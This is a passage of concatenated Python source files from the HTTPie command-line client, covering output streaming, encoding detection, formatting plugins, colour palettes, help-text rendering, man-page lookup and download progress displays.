earliest_warn_date = ( datetime.fromisoformat(last_warned_date) + WARN_INTERVAL ) if current_date < earliest_warn_date: return None env.log_error(update_status, level=LogLevel.INFO) version_info['last_warned_date'] = current_date.isoformat() with open_with_lockfile(file, 'w') as stream: json.dump(version_info, stream) File: httpie/internal/__build_channel__.py # Represents the packaging method. This file should # be overridden by every build system we support on # the packaging step. BUILD_CHANNEL = 'unknown' File: httpie/output/streams.py from abc import ABCMeta, abstractmethod from itertools import chain from typing import Callable, Iterable, Optional, Union from .processing import Conversion, Formatting from ..context import Environment from ..encoding import smart_decode, smart_encode, UTF8 from ..models import HTTPMessage, OutputOptions from ..utils import parse_content_type_header BINARY_SUPPRESSED_NOTICE = ( b'\n' b'+-----------------------------------------+\n' b'| NOTE: binary data not shown in terminal |\n' b'+-----------------------------------------+' ) class DataSuppressedError(Exception): message = None class BinarySuppressedError(DataSuppressedError): """An error indicating that the body is binary and won't be written, e.g., for terminal output).""" message = BINARY_SUPPRESSED_NOTICE class BaseStream(metaclass=ABCMeta): """Base HTTP message output stream class.""" def __init__( self, msg: HTTPMessage, output_options: OutputOptions, on_body_chunk_downloaded: Callable[[bytes], None] = None, **kwargs ): """ :param msg: a :class:`models.HTTPMessage` subclass :param output_options: a :class:`OutputOptions` instance to represent which parts of the message is printed. """ assert output_options.any() self.msg = msg self.output_options = output_options self.on_body_chunk_downloaded = on_body_chunk_downloaded self.extra_options = kwargs def get_headers(self) -> bytes: """Return the headers' bytes.""" return self.msg.headers.encode() def get_metadata(self) -> bytes: """Return the message metadata.""" return self.msg.metadata.encode() @abstractmethod def iter_body(self) -> Iterable[bytes]: """Return an iterator over the message body.""" def __iter__(self) -> Iterable[bytes]: """Return an iterator over `self.msg`.""" if self.output_options.headers: yield self.get_headers() yield b'\r\n\r\n' if self.output_options.body: try: for chunk in self.iter_body(): yield chunk if self.on_body_chunk_downloaded: self.on_body_chunk_downloaded(chunk) except DataSuppressedError as e: if self.output_options.headers: yield b'\n' yield e.message if self.output_options.meta: if self.output_options.body: yield b'\n\n' yield self.get_metadata() yield b'\n\n' class RawStream(BaseStream): """The message is streamed in chunks with no processing.""" CHUNK_SIZE = 1024 * 100 CHUNK_SIZE_BY_LINE = 1 def __init__(self, chunk_size=CHUNK_SIZE, **kwargs): super().__init__(**kwargs) self.chunk_size = chunk_size def iter_body(self) -> Iterable[bytes]: return self.msg.iter_body(self.chunk_size) ENCODING_GUESS_THRESHOLD = 3 class EncodedStream(BaseStream): """Encoded HTTP message stream. The message bytes are converted to an encoding suitable for `self.env.stdout`. Unicode errors are replaced and binary data is suppressed. The body is always streamed by line. """ CHUNK_SIZE = 1 def __init__( self, env=Environment(), mime_overwrite: str = None, encoding_overwrite: str = None, **kwargs ): super().__init__(**kwargs) if mime_overwrite: self.mime = mime_overwrite else: self.mime, _ = parse_content_type_header(self.msg.content_type) self._encoding = encoding_overwrite or self.msg.encoding self._encoding_guesses = [] if env.stdout_isatty: # Use the encoding supported by the terminal. output_encoding = env.stdout_encoding else: # Preserve the message encoding. output_encoding = self.msg.encoding # Default to UTF-8 when unsure. self.output_encoding = output_encoding or UTF8 def iter_body(self) -> Iterable[bytes]: for line, lf in self.msg.iter_lines(self.CHUNK_SIZE): if b'\0' in line: raise BinarySuppressedError() line = self.decode_chunk(line) yield smart_encode(line, self.output_encoding) + lf def decode_chunk(self, raw_chunk: str) -> str: chunk, guessed_encoding = smart_decode(raw_chunk, self.encoding) self._encoding_guesses.append(guessed_encoding) return chunk @property def encoding(self) -> Optional[str]: if self._encoding: return self._encoding # If we find a reliable (used consecutively) encoding, than # use it for the next iterations. if len(self._encoding_guesses) < ENCODING_GUESS_THRESHOLD: return None guess_1, guess_2 = self._encoding_guesses[-2:] if guess_1 == guess_2: self._encoding = guess_1 return guess_1 @encoding.setter def encoding(self, value) -> None: self._encoding = value class PrettyStream(EncodedStream): """In addition to :class:`EncodedStream` behaviour, this stream applies content processing. Useful for long-lived HTTP responses that stream by lines such as the Twitter streaming API. """ CHUNK_SIZE = 1 def __init__( self, conversion: Conversion, formatting: Formatting, **kwargs, ): super().__init__(**kwargs) self.formatting = formatting self.conversion = conversion def get_headers(self) -> bytes: return self.formatting.format_headers( self.msg.headers).encode(self.output_encoding) def get_metadata(self) -> bytes: return self.formatting.format_metadata( self.msg.metadata).encode(self.output_encoding) def iter_body(self) -> Iterable[bytes]: first_chunk = True iter_lines = self.msg.iter_lines(self.CHUNK_SIZE) for line, lf in iter_lines: if b'\0' in line: if first_chunk: converter = self.conversion.get_converter(self.mime) if converter: body = bytearray() # noinspection PyAssignmentToLoopOrWithParameter for line, lf in chain([(line, lf)], iter_lines): body.extend(line) body.extend(lf) self.mime, body = converter.convert(body) assert isinstance(body, str) yield self.process_body(body) return raise BinarySuppressedError() yield self.process_body(line) + lf first_chunk = False def process_body(self, chunk: Union[str, bytes]) -> bytes: if not isinstance(chunk, str): # Text when a converter has been used, # otherwise it will always be bytes. chunk = self.decode_chunk(chunk) chunk = self.formatting.format_body(content=chunk, mime=self.mime) return smart_encode(chunk, self.output_encoding) class BufferedPrettyStream(PrettyStream): """The same as :class:`PrettyStream` except that the body is fully fetched before it's processed. Suitable regular HTTP responses. """ CHUNK_SIZE = 1024 * 10 def iter_body(self) -> Iterable[bytes]: # Read the whole body before prettifying it, # but bail out immediately if the body is binary. converter = None body = bytearray() for chunk in self.msg.iter_body(self.CHUNK_SIZE): if not converter and b'\0' in chunk: converter = self.conversion.get_converter(self.mime) if not converter: raise BinarySuppressedError() body.extend(chunk) if converter: self.mime, body = converter.convert(body) yield self.process_body(body) File: httpie/output/models.py import argparse from typing import Any, Dict, Union, List, NamedTuple, Optional from httpie.context import Environment from httpie.cli.constants import PrettyOptions, PRETTY_MAP, PRETTY_STDOUT_TTY_ONLY from httpie.cli.argtypes import PARSED_DEFAULT_FORMAT_OPTIONS from httpie.output.formatters.colors import AUTO_STYLE class ProcessingOptions(NamedTuple): """Represents a set of stylistic options that are used when deciding which stream should be used.""" debug: bool = False traceback: bool = False stream: bool = False style: str = AUTO_STYLE prettify: Union[List[str], PrettyOptions] = PRETTY_STDOUT_TTY_ONLY response_mime: Optional[str] = None response_charset: Optional[str] = None json: bool = False format_options: Dict[str, Any] = PARSED_DEFAULT_FORMAT_OPTIONS def get_prettify(self, env: Environment) -> List[str]: if self.prettify is PRETTY_STDOUT_TTY_ONLY: return PRETTY_MAP['all' if env.stdout_isatty else 'none'] else: return self.prettify @classmethod def from_raw_args(cls, options: argparse.Namespace) -> 'ProcessingOptions': fetched_options = { option: getattr(options, option) for option in cls._fields } return cls(**fetched_options) @property def show_traceback(self): return self.debug or self.traceback File: httpie/output/__init__.py File: httpie/output/utils.py import json import re from typing import Tuple from ..utils import load_json_preserve_order_and_dupe_keys from .lexers.json import PREFIX_REGEX def load_prefixed_json(data: str) -> Tuple[str, json.JSONDecoder]: """Simple JSON loading from `data`. """ # First, the full data. try: return '', load_json_preserve_order_and_dupe_keys(data) except ValueError: pass # Then, try to find the start of the actual body. data_prefix, body = parse_prefixed_json(data) try: return data_prefix, load_json_preserve_order_and_dupe_keys(body) except ValueError: raise ValueError('Invalid JSON') def parse_prefixed_json(data: str) -> Tuple[str, str]: """Find the potential JSON body from `data`. Sometimes the JSON body is prefixed with a XSSI magic string, specific to the server. Return a tuple (data prefix, actual JSON body). """ matches = re.findall(PREFIX_REGEX, data) data_prefix = matches[0] if matches else '' body = data[len(data_prefix):] return data_prefix, body File: httpie/output/writer.py import errno import requests from typing import Any, Dict, IO, Optional, TextIO, Tuple, Type, Union from ..cli.dicts import HTTPHeadersDict from ..context import Environment from ..models import ( HTTPRequest, HTTPResponse, HTTPMessage, RequestsMessage, RequestsMessageKind, OutputOptions, ) from .models import ProcessingOptions from .processing import Conversion, Formatting from .streams import ( BaseStream, BufferedPrettyStream, EncodedStream, PrettyStream, RawStream, ) from ..utils import parse_content_type_header MESSAGE_SEPARATOR = '\n\n' MESSAGE_SEPARATOR_BYTES = MESSAGE_SEPARATOR.encode() def write_message( requests_message: RequestsMessage, env: Environment, output_options: OutputOptions, processing_options: ProcessingOptions, extra_stream_kwargs: Optional[Dict[str, Any]] = None ): if not output_options.any(): return write_stream_kwargs = { 'stream': build_output_stream_for_message( env=env, requests_message=requests_message, output_options=output_options, processing_options=processing_options, extra_stream_kwargs=extra_stream_kwargs ), # NOTE: `env.stdout` will in fact be `stderr` with `--download` 'outfile': env.stdout, 'flush': env.stdout_isatty or processing_options.stream } try: if env.is_windows and 'colors' in processing_options.get_prettify(env): write_stream_with_colors_win(**write_stream_kwargs) else: write_stream(**write_stream_kwargs) except OSError as e: if processing_options.show_traceback and e.errno == errno.EPIPE: # Ignore broken pipes unless --traceback. env.stderr.write('\n') else: raise def write_stream( stream: BaseStream, outfile: Union[IO, TextIO], flush: bool ): """Write the output stream.""" try: # Writing bytes so we use the buffer interface. buf = outfile.buffer except AttributeError: buf = outfile for chunk in stream: buf.write(chunk) if flush: outfile.flush() def write_stream_with_colors_win( stream: 'BaseStream', outfile: TextIO, flush: bool ): """Like `write`, but colorized chunks are written as text directly to `outfile` to ensure it gets processed by colorama. Applies only to Windows and colorized terminal output. """ color = b'\x1b[' encoding = outfile.encoding for chunk in stream: if color in chunk: outfile.write(chunk.decode(encoding)) else: outfile.buffer.write(chunk) if flush: outfile.flush() def write_raw_data( env: Environment, data: Any, *, processing_options: Optional[ProcessingOptions] = None, headers: Optional[HTTPHeadersDict] = None, stream_kwargs: Optional[Dict[str, Any]] = None ): msg = requests.PreparedRequest() msg.is_body_upload_chunk = True msg.body = data msg.headers = headers or HTTPHeadersDict() msg_output_options = OutputOptions.from_message(msg, body=True, headers=False) return write_message( requests_message=msg, env=env, output_options=msg_output_options, processing_options=processing_options or ProcessingOptions(), extra_stream_kwargs=stream_kwargs ) def build_output_stream_for_message( env: Environment, requests_message: RequestsMessage, output_options: OutputOptions, processing_options: ProcessingOptions, extra_stream_kwargs: Optional[Dict[str, Any]] = None ): message_type = { RequestsMessageKind.REQUEST: HTTPRequest, RequestsMessageKind.RESPONSE: HTTPResponse, }[output_options.kind] stream_class, stream_kwargs = get_stream_type_and_kwargs( env=env, processing_options=processing_options, message_type=message_type, headers=requests_message.headers ) if extra_stream_kwargs: stream_kwargs.update(extra_stream_kwargs) yield from stream_class( msg=message_type(requests_message), output_options=output_options, **stream_kwargs, ) if (env.stdout_isatty and output_options.body and not output_options.meta and not getattr(requests_message, 'is_body_upload_chunk', False)): # Ensure a blank line after the response body. # For terminal output only. yield MESSAGE_SEPARATOR_BYTES def get_stream_type_and_kwargs( env: Environment, processing_options: ProcessingOptions, message_type: Type[HTTPMessage], headers: HTTPHeadersDict, ) -> Tuple[Type['BaseStream'], dict]: """Pick the right stream type and kwargs for it based on `env` and `args`. """ is_stream = processing_options.stream prettify_groups = processing_options.get_prettify(env) if not is_stream and message_type is HTTPResponse: # If this is a response, then check the headers for determining # auto-streaming. raw_content_type_header = headers.get('Content-Type', None) if raw_content_type_header: content_type_header, _ = parse_content_type_header(raw_content_type_header) is_stream = (content_type_header == 'text/event-stream') if not env.stdout_isatty and not prettify_groups: stream_class = RawStream stream_kwargs = { 'chunk_size': ( RawStream.CHUNK_SIZE_BY_LINE if is_stream else RawStream.CHUNK_SIZE ) } else: stream_class = EncodedStream stream_kwargs = { 'env': env, } if message_type is HTTPResponse: stream_kwargs.update({ 'mime_overwrite': processing_options.response_mime, 'encoding_overwrite': processing_options.response_charset, }) if prettify_groups: stream_class = PrettyStream if is_stream else BufferedPrettyStream stream_kwargs.update({ 'conversion': Conversion(), 'formatting': Formatting( env=env, groups=prettify_groups, color_scheme=processing_options.style, explicit_json=processing_options.json, format_options=processing_options.format_options, ) }) return stream_class, stream_kwargs File: httpie/output/processing.py import re from typing import Optional, List from ..plugins import ConverterPlugin from ..plugins.registry import plugin_manager from ..context import Environment MIME_RE = re.compile(r'^[^/]+/[^/]+$') def is_valid_mime(mime): return mime and MIME_RE.match(mime) class Conversion: @staticmethod def get_converter(mime: str) -> Optional[ConverterPlugin]: if is_valid_mime(mime): for converter_class in plugin_manager.get_converters(): if converter_class.supports(mime): return converter_class(mime) class Formatting: """A delegate class that invokes the actual processors.""" def __init__(self, groups: List[str], env=Environment(), **kwargs): """ :param groups: names of processor groups to be applied :param env: Environment :param kwargs: additional keyword arguments for processors """ available_plugins = plugin_manager.get_formatters_grouped() self.enabled_plugins = [] for group in groups: for cls in available_plugins[group]: p = cls(env=env, **kwargs) if p.enabled: self.enabled_plugins.append(p) def format_headers(self, headers: str) -> str: for p in self.enabled_plugins: headers = p.format_headers(headers) return headers def format_body(self, content: str, mime: str) -> str: if is_valid_mime(mime): for p in self.enabled_plugins: content = p.format_body(content, mime) return content def format_metadata(self, metadata: str) -> str: for p in self.enabled_plugins: metadata = p.format_metadata(metadata) return metadata File: httpie/output/ui/__init__.py File: httpie/output/ui/palette.py from dataclasses import dataclass, field from enum import Enum, auto from typing import Optional, List PYGMENTS_BRIGHT_BLACK = 'ansibrightblack' AUTO_STYLE = 'auto' # Follows terminal ANSI color styles class Styles(Enum): PIE = auto() ANSI = auto() class PieStyle(str, Enum): UNIVERSAL = 'pie' DARK = 'pie-dark' LIGHT = 'pie-light' PIE_STYLE_TO_SHADE = { PieStyle.DARK: '500', PieStyle.UNIVERSAL: '600', PieStyle.LIGHT: '700', } SHADE_TO_PIE_STYLE = { shade: style for style, shade in PIE_STYLE_TO_SHADE.items() } class ColorString(str): def __or__(self, other: str) -> 'ColorString': """Combine a style with a property. E.g: PieColor.BLUE | BOLD | ITALIC """ if isinstance(other, str): # In case of PieColor.BLUE | SOMETHING # we just create a new string. return ColorString(self + ' ' + other) elif isinstance(other, GenericColor): # If we see a GenericColor, then we'll wrap it # in with the desired property in a different class. return _StyledGenericColor(other, styles=self.split()) elif isinstance(other, _StyledGenericColor): # And if it is already wrapped, we'll just extend the # list of properties. other.styles.extend(self.split()) return other else: return NotImplemented class PieColor(ColorString, Enum): """Styles that are available only in Pie themes.""" PRIMARY = 'primary' SECONDARY = 'secondary' WHITE = 'white' BLACK = 'black' GREY = 'grey' AQUA = 'aqua' PURPLE = 'purple' ORANGE = 'orange' RED = 'red' BLUE = 'blue' PINK = 'pink' GREEN = 'green' YELLOW = 'yellow' class GenericColor(Enum): """Generic colors that are safe to use everywhere.""" # <https://rich.readthedocs.io/en/stable/appendix/colors.html> WHITE = {Styles.PIE: PieColor.WHITE, Styles.ANSI: 'white'} BLACK = {Styles.PIE: PieColor.BLACK, Styles.ANSI: 'black'} GREEN = {Styles.PIE: PieColor.GREEN, Styles.ANSI: 'green'} ORANGE = {Styles.PIE: PieColor.ORANGE, Styles.ANSI: 'yellow'} YELLOW = {Styles.PIE: PieColor.YELLOW, Styles.ANSI: 'bright_yellow'} BLUE = {Styles.PIE: PieColor.BLUE, Styles.ANSI: 'blue'} PINK = {Styles.PIE: PieColor.PINK, Styles.ANSI: 'bright_magenta'} PURPLE = {Styles.PIE: PieColor.PURPLE, Styles.ANSI: 'magenta'} RED = {Styles.PIE: PieColor.RED, Styles.ANSI: 'red'} AQUA = {Styles.PIE: PieColor.AQUA, Styles.ANSI: 'cyan'} GREY = {Styles.PIE: PieColor.GREY, Styles.ANSI: 'bright_black'} def apply_style( self, style: Styles, *, style_name: Optional[str] = None ) -> str: """Apply the given style to a particular value.""" exposed_color = self.value[style] if style is Styles.PIE: assert style_name is not None shade = PIE_STYLE_TO_SHADE[PieStyle(style_name)] return get_color(exposed_color, shade) else: return exposed_color @dataclass class _StyledGenericColor: color: 'GenericColor' styles: List[str] = field(default_factory=list) # noinspection PyDictCreation COLOR_PALETTE = { # Copy the brand palette PieColor.WHITE: '#F5F5F0', PieColor.BLACK: '#1C1818', PieColor.GREY: { '50': '#F5F5F0', '100': '#EDEDEB', '200': '#D1D1CF', '300': '#B5B5B2', '400': '#999999', '500': '#7D7D7D', '600': '#666663', '700': '#4F4D4D', '800': '#363636', '900': '#1C1818', 'DEFAULT': '#7D7D7D', }, PieColor.AQUA: { '50': '#E8F0F5', '100': '#D6E3ED', '200': '#C4D9E5', '300': '#B0CCDE', '400': '#9EBFD6', '500': '#8CB4CD', '600': '#7A9EB5', '700': '#698799', '800': '#597082', '900': '#455966', 'DEFAULT': '#8CB4CD', }, PieColor.PURPLE: { '50': '#F0E0FC', '100': '#E3C7FA', '200': '#D9ADF7', '300': '#CC96F5', '400': '#BF7DF2', '500': '#B464F0', '600': '#9E54D6', '700': '#8745BA', '800': '#70389E', '900': '#5C2982', 'DEFAULT': '#B464F0', }, PieColor.ORANGE: { '50': '#FFEDDB', '100': '#FFDEBF', '200': '#FFCFA3', '300': '#FFBF87', '400': '#FFB06B', '500': '#FFA24E', '600': '#F2913D', '700': '#E3822B', '800': '#D6701C', '900': '#C75E0A', 'DEFAULT': '#FFA24E', }, PieColor.RED: { '50': '#FFE0DE', '100': '#FFC7C4', '200': '#FFB0AB', '300': '#FF968F', '400': '#FF8075', '500': '#FF665B', '600': '#E34F45', '700': '#C7382E', '800': '#AD2117', '900': '#910A00', 'DEFAULT': '#FF665B', }, PieColor.BLUE: { '50': '#DBE3FA', '100': '#BFCFF5', '200': '#A1B8F2', '300': '#85A3ED', '400': '#698FEB', '500': '#4B78E6', '600': '#426BD1', '700': '#3B5EBA', '800': '#3354A6', '900': '#2B478F', 'DEFAULT': '#4B78E6', }, PieColor.PINK: { '50': '#FFEBFF', '100': '#FCDBFC', '200': '#FCCCFC', '300': '#FCBAFC', '400': '#FAABFA', '500': '#FA9BFA', '600': '#DE85DE', '700': '#C26EC2', '800': '#A854A6', '900': '#8C3D8A', 'DEFAULT': '#FA9BFA', }, PieColor.GREEN: { '50': '#E3F7E8', '100': '#CCF2D6', '200': '#B5EDC4', '300': '#A1E8B0', '400': '#8AE09E', '500': '#73DC8C', '600': '#63C27A', '700': '#52AB66', '800': '#429154', '900': '#307842', 'DEFAULT': '#73DC8C', }, PieColor.YELLOW: { '50': '#F7F7DB', '100': '#F2F2BF', '200': '#EDEDA6', '300': '#E5E88A', '400': '#E0E36E', '500': '#DBDE52', '600': '#CCCC3D', '700': '#BABA29', '800': '#ABA614', '900': '#999400', 'DEFAULT': '#DBDE52', }, } COLOR_PALETTE.update( { # Terminal-specific palette customizations. PieColor.GREY: { # Grey is the same no matter shade for the colors shade: COLOR_PALETTE[PieColor.GREY]['500'] for shade in COLOR_PALETTE[PieColor.GREY].keys() }, PieColor.PRIMARY: { '700': COLOR_PALETTE[PieColor.BLACK], '600': PYGMENTS_BRIGHT_BLACK, '500': COLOR_PALETTE[PieColor.WHITE], }, PieColor.SECONDARY: { '700': '#37523C', '600': '#6c6969', '500': '#6c6969', }, } ) def boldify(color: PieColor) -> str: return f'bold {color}' # noinspection PyDefaultArgument def get_color( color: PieColor, shade: str, *, palette=COLOR_PALETTE ) -> Optional[str]: if color not in palette: return None color_code = palette[color] if isinstance(color_code, dict) and shade in color_code: return color_code[shade] else: return color_code File: httpie/output/ui/rich_utils.py import os from typing import Iterator from contextlib import contextmanager from rich.console import Console, RenderableType from rich.highlighter import Highlighter from httpie.output.ui.rich_palette import _make_rich_color_theme def render_as_string(renderable: RenderableType) -> str: """Render any `rich` object in a fake console and return a *style-less* version of it as a string.""" with open(os.devnull, 'w') as null_stream: fake_console = Console(file=null_stream, record=True, theme=_make_rich_color_theme()) fake_console.print(renderable) return fake_console.export_text() @contextmanager def enable_highlighter( console: Console, highlighter: Highlighter, ) -> Iterator[Console]: """Enable a highlighter temporarily.""" original_highlighter = console.highlighter try: console.highlighter = highlighter yield console finally: console.highlighter = original_highlighter File: httpie/output/ui/rich_help.py import re import textwrap from typing import AbstractSet, Iterable, Optional, Tuple from rich.console import RenderableType from rich.highlighter import RegexHighlighter from rich.padding import Padding from rich.table import Table from rich.text import Text from httpie.cli.constants import SEPARATOR_GROUP_ALL_ITEMS from httpie.cli.options import Argument, ParserSpec, Qualifiers from httpie.output.ui.palette import GenericColor SEPARATORS = '|'.join(map(re.escape, SEPARATOR_GROUP_ALL_ITEMS)) STYLE_METAVAR = GenericColor.YELLOW STYLE_SWITCH = GenericColor.GREEN STYLE_PROGRAM_NAME = GenericColor.GREEN # .boldify() STYLE_USAGE_OPTIONAL = GenericColor.GREY STYLE_USAGE_REGULAR = GenericColor.WHITE STYLE_USAGE_ERROR = GenericColor.RED STYLE_USAGE_MISSING = GenericColor.YELLOW STYLE_BOLD = 'bold' MAX_CHOICE_CHARS = 80 LEFT_PADDING_2 = (0, 0, 0, 2) LEFT_PADDING_3 = (0, 0, 0, 3) LEFT_PADDING_4 = (0, 0, 0, 4) LEFT_PADDING_5 = (0, 0, 0, 4) LEFT_INDENT_2 = (1, 0, 0, 2) LEFT_INDENT_3 = (1, 0, 0, 3) LEFT_INDENT_BOTTOM_3 = (0, 0, 1, 3) MORE_INFO_COMMANDS = """ To learn more, you can try: -> running 'http --manual' -> visiting our full documentation at https://httpie.io/docs/cli """ class OptionsHighlighter(RegexHighlighter): highlights = [ r'(^|\W)(?P<option>\-{1,2}[\w|-]+)(?![a-zA-Z0-9])', r'(?P<bold>HTTPie)', ] options_highlighter = OptionsHighlighter() def unpack_argument( argument: Argument, ) -> Tuple[Text, Text]: opt1 = opt2 = '' style = None if argument.aliases: if len(argument.aliases) >= 2: opt2, opt1 = argument.aliases else: (opt1,) = argument.aliases else: opt1 = argument.metavar style = STYLE_USAGE_REGULAR return Text(opt1, style=style), Text(opt2) def to_usage( spec: ParserSpec, *, program_name: Optional[str] = None, whitelist: AbstractSet[str] = frozenset() ) -> RenderableType: shown_arguments = [ argument for group in spec.groups for argument in group.arguments if (not argument.aliases or whitelist.intersection(argument.aliases)) ] # Sort the shown_arguments so that --dash options are # shown first shown_arguments.sort(key=lambda argument: argument.aliases, reverse=True) text = Text(program_name or spec.program, style=STYLE_BOLD) for argument in shown_arguments: text.append(' ') is_whitelisted = whitelist.intersection(argument.aliases) if argument.aliases: name = '/'.join(sorted(argument.aliases, key=len)) else: name = argument.metavar nargs = argument.configuration.get('nargs') if nargs is Qualifiers.OPTIONAL: text.append('[' + name + ']', style=STYLE_USAGE_OPTIONAL) elif nargs is Qualifiers.ZERO_OR_MORE: text.append( '[' + name + ' ...]', style=STYLE_USAGE_OPTIONAL, ) else: text.append( name, style=STYLE_USAGE_ERROR if is_whitelisted else STYLE_USAGE_REGULAR, ) raw_form = argument.serialize() if raw_form.get('choices'): text.append(' ') text.append( '{' + ', '.join(raw_form['choices']) + '}', style=STYLE_USAGE_MISSING, ) return text # This part is loosely based on the rich-click's help message # generation. def to_help_message( spec: ParserSpec, ) -> Iterable[RenderableType]: yield Padding( options_highlighter(spec.description), LEFT_INDENT_2, ) yield Padding( Text('Usage', style=STYLE_SWITCH), LEFT_INDENT_2, ) yield Padding(to_usage(spec), LEFT_INDENT_3) group_rows = {} for group in spec.groups: options_rows = [] for argument in group.arguments: if argument.is_hidden: continue opt1, opt2 = unpack_argument(argument) if opt2: opt1.append('/') opt1.append(opt2) # Column for a metavar, if we have one metavar = Text(style=STYLE_METAVAR) metavar.append(argument.configuration.get('metavar', '')) if opt1 == metavar: metavar = Text('') raw_form = argument.serialize() desc = raw_form.get('short_description', '') if raw_form.get('choices'): desc += ' (choices: ' desc += textwrap.shorten( ', '.join(raw_form.get('choices')), MAX_CHOICE_CHARS, ) desc += ')' rows = [ Padding( options_highlighter(opt1), LEFT_PADDING_2, ), metavar, options_highlighter(desc), ] options_rows.append(rows) if argument.configuration.get('nested_options'): options_rows.extend( [ ( Padding( Text( key, style=STYLE_USAGE_OPTIONAL, ), LEFT_PADDING_4, ), value, dec, ) for key, value, dec in argument.nested_options ] ) group_rows[group.name] = options_rows options_table = Table(highlight=False, box=None, show_header=False) for group_name, options_rows in group_rows.items(): options_table.add_row(Text(), Text(), Text()) options_table.add_row( Text(group_name, style=STYLE_SWITCH), Text(), Text(), ) options_table.add_row(Text(), Text(), Text()) for row in options_rows: options_table.add_row(*row) yield Padding( Text('Options', style=STYLE_SWITCH), LEFT_INDENT_2, ) yield Padding(options_table, LEFT_PADDING_2) yield Padding( Text('More Information', style=STYLE_SWITCH), LEFT_INDENT_2, ) yield Padding( MORE_INFO_COMMANDS.rstrip('\n'), LEFT_PADDING_3 ) yield Padding( spec.epilog.rstrip('\n'), LEFT_INDENT_BOTTOM_3, ) File: httpie/output/ui/man_pages.py """Logic for checking and displaying man pages.""" import subprocess import os from httpie.context import Environment MAN_COMMAND = 'man' NO_MAN_PAGES = os.getenv('HTTPIE_NO_MAN_PAGES', False) # On some systems, HTTP(n) might exist, but we are only interested in HTTP(1). # For more information on man page sections: <https://unix.stackexchange.com/a/138643> MAN_PAGE_SECTION = '1' def is_available(program: str) -> bool: """ Check whether `program`'s man pages are available on this system. """ if NO_MAN_PAGES or os.system == 'nt': return False try: process = subprocess.run( [MAN_COMMAND, MAN_PAGE_SECTION, program], shell=False, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL ) except Exception: # There might be some errors outside the process, e.g # a permission error to execute something that is not an # executable. return False else: return process.returncode == 0 def display_for(env: Environment, program: str) -> None: """ Open the system man page for the given command (http/https/httpie). """ subprocess.run( [MAN_COMMAND, MAN_PAGE_SECTION, program], stdout=env.stdout, stderr=env.stderr ) File: httpie/output/ui/rich_palette.py from collections import ChainMap from typing import TYPE_CHECKING, Any, Optional if TYPE_CHECKING: from rich.theme import Theme from httpie.output.ui.palette import GenericColor, PieStyle, Styles, ColorString, _StyledGenericColor # noqa RICH_BOLD = ColorString('bold') # Rich-specific color code declarations # <https://github.com/Textualize/rich/blob/fcd684dd3a482977cab620e71ccaebb94bf13ac9/rich/default_styles.py> CUSTOM_STYLES = { 'progress.description': RICH_BOLD | GenericColor.WHITE, 'progress.data.speed': RICH_BOLD | GenericColor.GREEN, 'progress.percentage': RICH_BOLD | GenericColor.AQUA, 'progress.download': RICH_BOLD | GenericColor.AQUA, 'progress.remaining': RICH_BOLD | GenericColor.ORANGE, 'bar.complete': RICH_BOLD | GenericColor.PURPLE, 'bar.finished': RICH_BOLD | GenericColor.GREEN, 'bar.pulse': RICH_BOLD | GenericColor.PURPLE, 'option': RICH_BOLD | GenericColor.PINK, } class _GenericColorCaster(dict): """ Translate GenericColor to a regular string on the attribute access phase. """ def _translate(self, key: Any) -> Any: if isinstance(key, GenericColor): return key.name.lower() else: return key def __getitem__(self, key: Any) -> Any: return super().__getitem__(self._translate(key)) def get(self, key: Any) -> Any: return super().get(self._translate(key)) def _make_rich_color_theme(style_name: Optional[str] = None) -> 'Theme': from rich.style import Style from rich.theme import Theme try: PieStyle(style_name) except ValueError: style = Styles.ANSI else: style = Styles.PIE theme = Theme() for color, color_set in ChainMap( GenericColor.__members__, CUSTOM_STYLES ).items(): if isinstance(color_set, _StyledGenericColor): properties = dict.fromkeys(color_set.styles, True) color_set = color_set.color else: properties = {} theme.styles[color.lower()] = Style( color=color_set.apply_style(style, style_name=style_name), **properties, ) # E.g translate GenericColor.BLUE into blue on key access theme.styles = _GenericColorCaster(theme.styles) return theme File: httpie/output/ui/rich_progress.py from dataclasses import dataclass from typing import TYPE_CHECKING, Optional from httpie.context import Environment if TYPE_CHECKING: from rich.console import Console @dataclass class BaseDisplay: env: Environment def start( self, *, total: Optional[float], at: float, description: str ) -> None: ... def update(self, steps: float) -> None: ... def stop(self, time_spent: float) -> None: ... @property def console(self) -> 'Console': """Returns the default console to be used with displays (stderr).""" return self.env.rich_error_console def _print_summary( self, is_finished: bool, observed_steps: int, time_spent: float ): from rich import filesize if is_finished: verb = 'Done' else: verb = 'Interrupted' total_size = filesize.decimal(observed_steps) avg_speed = filesize.decimal(observed_steps / time_spent) minutes, seconds = divmod(time_spent, 60) hours, minutes = divmod(int(minutes), 60) if hours: total_time = f'{hours:d}:{minutes:02d}:{seconds:0.5f}' else: total_time = f'{minutes:02d}:{seconds:0.5f}' self.console.print( f'[progress.description]{verb}. {total_size} in {total_time} ({avg_speed}/s)' ) class DummyDisplay(BaseDisplay): """ A dummy display object to be used when the progress bars, spinners etc. are disabled globally (or during tests). """ class StatusDisplay(BaseDisplay): def start( self, *, total: Optional[float], at: float, description: str ) -> None: self.observed = at self.description = ( f'[progress.description]{description}[/progress.description]' ) self.status = self.console.status(self.description, spinner='line') self.status.start() def update(self, steps: float) -> None: from rich import filesize self.observed += steps observed_amount, observed_unit = filesize.decimal( self.observed ).split() self.status.update( status=f'{self.description} [progress.download]{observed_amount}/? {observed_unit}[/progress.download]' ) def stop(self, time_spent: float) -> None: self.status.stop() self.console.print(self.description) if time_spent: self._print_summary( is_finished=True, observed_steps=self.observed, time_spent=time_spent, ) class ProgressDisplay(BaseDisplay): def start( self, *, total: Optional[float], at: float, description: str ) -> None: from rich.progress import ( Progress, BarColumn, DownloadColumn, TimeRemainingColumn, TransferSpeedColumn, ) assert total is not None self.console.print(f'[progress.description]{description}') self.progress_bar = Progress( '[', BarColumn(), ']', '[progress.percentage]{task.percentage:>3.0f}%', '(', DownloadColumn(), ')', TimeRemainingColumn(), TransferSpeedColumn(), console=self.console, transient=True, ) self.progress_bar.start() self.transfer_task = self.progress_bar.add_task( description, completed=at, total=total ) def update(self, steps: float) -> None: self.progress_bar.advance(self.transfer_task, steps) def stop(self, time_spent: Optional[float]) -> None: self.progress_bar.stop() if time_spent: [task] = self.progress_bar.tasks self._print_summary( is_finished=task.finished, observed_steps=task.completed, time_spent=time_spent, ) File: httpie/output/lexers/metadata.py import pygments from httpie.models import ELAPSED_TIME_LABEL from httpie.output.lexers.common import precise SPEED_TOKENS = { 0.45: pygments.token.Number.SPEED.FAST, 1.00: pygments.token.Number.SPEED.AVG, 2.50: pygments.token.Number.SPEED.SLOW, } def 